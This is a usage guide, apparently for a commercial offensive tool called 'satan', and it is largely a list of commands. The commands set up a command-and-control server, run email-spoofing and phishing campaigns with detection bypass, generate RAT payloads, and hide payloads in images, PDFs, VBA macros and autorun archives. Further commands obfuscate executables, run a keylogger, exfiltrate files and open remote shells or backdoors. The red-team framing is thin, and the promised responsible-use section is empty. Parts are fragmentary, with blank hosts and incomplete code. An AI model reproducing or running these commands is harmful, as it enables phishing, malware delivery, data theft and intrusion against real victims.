git clone
cd x-satan
go build -o c2server main.go
./setup --key-[Activation key received via email] --user-token [user token in email] --activate
sudo mv c2server /usr/local/bin/
./satan --manual
./satan -h
To ensure secure access, the software includes a CLI-based login system. Use the following commands:
./satan --login --username yourUsername --password yourPassword --token yourtoken
./satan --logout
Create and manage subaccounts for team members or collaborators:
./satan --create-subaccount --username subUser --password subPass
./satan --list-subaccounts
./satan --delete-subaccount --username subUser
Import custom payloads into the system:
./satan --import-payload --file path/to/payload
./satan --list-payloads
./satan --delete-payload --id payloadID
Configure the software to access email servers:
./satan --imap-login --server --port 993 --username --password emailPassword
./satan --pop-login --server --port 995 --username --password emailPassword
Use Termux on Android to monitor the server:
pkg install openssh
ssh username@your-server-ip
tail -f /path/to/server/logs
The software is designed for red team operations and ethical hacking. Below are additional usage scenarios:
Set up fully automated campaigns using JSON configuration files. Example:
"name": "EmailSpoofCampaign",
"target_emails": ["", ""],
"payload": "stego_image.png",
"server": "",
"port": 587,
"credentials": {
"username": "",
"password": "password"
Run the campaign:
./satan --run-campaign --config campaign.json
The software provides a comprehensive CLI for setting up and managing campaigns. Below are common commands:
./c2server --start
./c2server --configure --campaign "SocialEngTest"
./c2server --generate-payload --type rat --output payload.exe
./c2server --logs
Embed payloads into images using Go-based libraries like ``:
package main
import (
func main() {
inputFile, _ := os.Open("image.png")
outputFile, _ := os.Create("stego_image.png")
payload := []byte("YourEncodedPayloadHere")
steganography.Encode(inputFile, outputFile, payload)
Use `satan` to generate payloads and embed them into Office documents:
satan -p windows/macro/embed LHOST= LPORT=4445 -f vba > payload.vba
Then inject the generated VBA macro into a Word document.
Use Go-based packer tools to obfuscate payloads:
satan --target app.exe --input payload.vba --output packed_payload.exe
Automate extraction and execution with scripting:
echo "@echo off\nstart payload.exe" > autorun.bat
Add the batch file and payload to the archive.
Using satan to embed payloads:
satan --embed payload.exe --input file.pdf --output malicious.pdf
For videos or audio, add input file name and extentions to embed payloads in metadata or unused streams.
The software supports creating and managing multiple advanced campaigns for phishing, payload delivery, and post-exploitation. Configure campaigns using JSON templates:
"name": "PhishingCampaign",
"targets": ["", ""],
"payload": "payload.png",
"delivery": "email"
./c2server --run-campaign PhishingCampaign
./c2server --list-campaigns
./c2server --stop-campaign PhishingCampaign
Once a payload is executed on a target system, the following techniques are supported:
./c2server --execute-command "ls -la" --target
Follow these best practices while using the software:
./satan hive --start
./satan hive --stop
./satan hive --status
./satan hive --automate --type rat --method stealth
Satan is a GUI software for the Deluxe plan only to turn GUI on/off On Deluxe:
./satan --gui --switch
./satan --terminal --switch
To launch the web-based graphical user interface (GUI) available on basic plan:
./satan --web-gui
Access the GUI via http://localhost:8888.
./satan --email-spoof --smtp [server]:port --passowrd [password] --email [email] --run-grit --bypass-detection --grab-keys --from "" --to "" --subject "Urgent Update" --body "Click the link below." --satan-mode
Use crafted headers for certain security filters:
./satan --email-spoof --smtp-file credentials.txt --from "" --to "" --headers "X-Trusted: true; Reply-To:" --relay --satan-mode
Monitor emails sent through the spoofing tool for delivery and response:
./satan --email-monitor --log-file email_logs.txt
./satan --steg-hide --input image.png --payload payload.exe --output stego_image.png
./satan --macro-gen --payload payload.exe --output malicious_macro.docm
./satab --obfuscate --input payload.exe --output obfuscated_payload.exe
./satan --start-c2 --port 4444
./satan --connect-backdoor --target --port 4444
./satan --keylogger --output logs.txt
./satan --exfiltrate --file /path/to/file.txt --target
./satan --remote-shell --target
To ensure safe and responsible use of the tool, follow these guidelines: